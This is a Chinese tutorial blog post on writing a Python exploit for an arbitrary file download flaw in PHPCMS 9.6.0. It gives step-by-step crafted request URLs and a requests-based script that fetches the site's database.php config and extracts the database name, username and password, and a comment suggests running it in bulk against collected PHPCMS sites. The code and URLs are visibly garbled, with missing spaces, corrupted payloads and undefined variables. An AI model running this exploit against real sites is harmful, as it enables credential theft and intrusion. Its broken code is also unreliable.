linux phpcms,PHPCMS任意文件下载之exp编写

导读

学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp

实验工具:firefox,burp,phpcms9.6.0

实验语言:Python3.4

实验环境:php+mysql+apache

首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤

这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后再来实际复现一遍。

漏洞复现流程就是按照我们下方的每一步链接走下去!

第一步

我们先来获取phpcms/modules/wap/index.php中的cookie值

http://127.0.0.1:9096/phpcms0/index.php?m=wap&c=index&a=init&siteid=1

1fab65d9d6586b9e244d6d92a77e039e.png

第二步

修改标红部分的文件即为自己想要下载的文件,这里标红部分就是你想要下载的内部文件。也就是在第二部构造我们的下载链接。对应的是构造的payload

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%2%2*70

44a24bb2fffd366709064adc776d00df.png

第三步

访问该链接得到_att_json值

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%252%2]index.ph... h&f=p%3%252%2*70C

eba6246a5a77cdbb5c479aafbb265107.png

第四步

通过获取到的_att_json值来构造下载payload

2b7e79bad12f39b86c1adfb769e443bb.png

第五步

通过增加json值认证去访问构造好的下载链接。将get请求中的a_k参数值替换成获取到的_att_json值,并且请求即可。这里后面的标红部分就是获取到的_att_json值

最后点击“点击下载”按钮,即可下载/caches/configs/database.php文件

499b84ce36132754ec00bf815ea601b3.png

90883c9323d680b987ca300eec6e1dbd.png

exp编写

漏洞复现流程走完之后我们就要来按照漏洞复现流程进行编写我们的exp:

#-*-coding=utf-8 -*-

#author = Free雅轩

importrequests

#导入requests模块,模拟爬取访问网页

importre

#导入re正则模块,对网页中我们所需的内容进行匹配

fromurllib.parse import quote

#从urllib.parse模块中导入quote方法,用于对传递进来的url进行编码re

TIMEOUT= 3

#设置网页响应超时时间为3秒

url= r'http://127.0.0.1:9096/phpcms9.0'

#定义URL地址

#这里其实是可以利用采集工具/模拟引擎来进行爬取PHPCMS的关键字来进行批量读取/验证操作

payload=r'&id=1&m=1&f=caches/configs/database.ph%3C&modelid=1&catid=1&s=&i=1&d=1&'

#定义漏洞利用payload

cookies= {}

#设置cookie

#步骤一 获取cookie

step1= '{}/index.php?m=wap&c=index&a=init&siteid=1/'.format(url)

print('step1:{}'.format(step1))

#模拟人工操作构造第一个payload

response1_cookies= requests.get(step1 , timeout=3).cookies

#将第一步的url和cookies结合并赋值给response_cookies,设置url响应超时时间为3秒

fori in response1_cookies:

print(i)

if i.name[-7:] == '_siteid':

cookies_head = i.name[:6]

cookies[cookies_head + '_userid' ] = i.value

cookies[i.name] = i.value

print(cookies)

#步骤二 获取_att_json

step2='{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}'.format(url, quote(payload))

print('step2:{}'.format(step2))

response2_cookies= requests.get(step2 , timeout=3 , cookies=cookies).cookies

forj in response2_cookies:

if j.name[-9:] == '_att_json':

enc_payload = j.value

#步骤三 获取构造下载链接

step3= '{}/index.php?m=content&c=down&a_k={}'.format(url,enc_payload)

print('step3:{}'.format(step3))

#步骤四 利用requests模块中的text方法将网页输出,将获取到的链接中的db,username,password等重要信息匹配出来

step4= requests.get(step3 , timeout=3 , cookies=cookies).text

file= re.findall(r''([\S]+)'"

re_username= r"'username' => '([\S]+)'"

re_password= r"'password' => '([\S]+)'"

db =re.search(re_db, ret).group(1)

username= re.search(re_username, ret).group(1)

password= re.search(re_password, ret).group(1)

print(db,username, password)

exp利用

d57585d3be28b2293c070004e710dba4.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值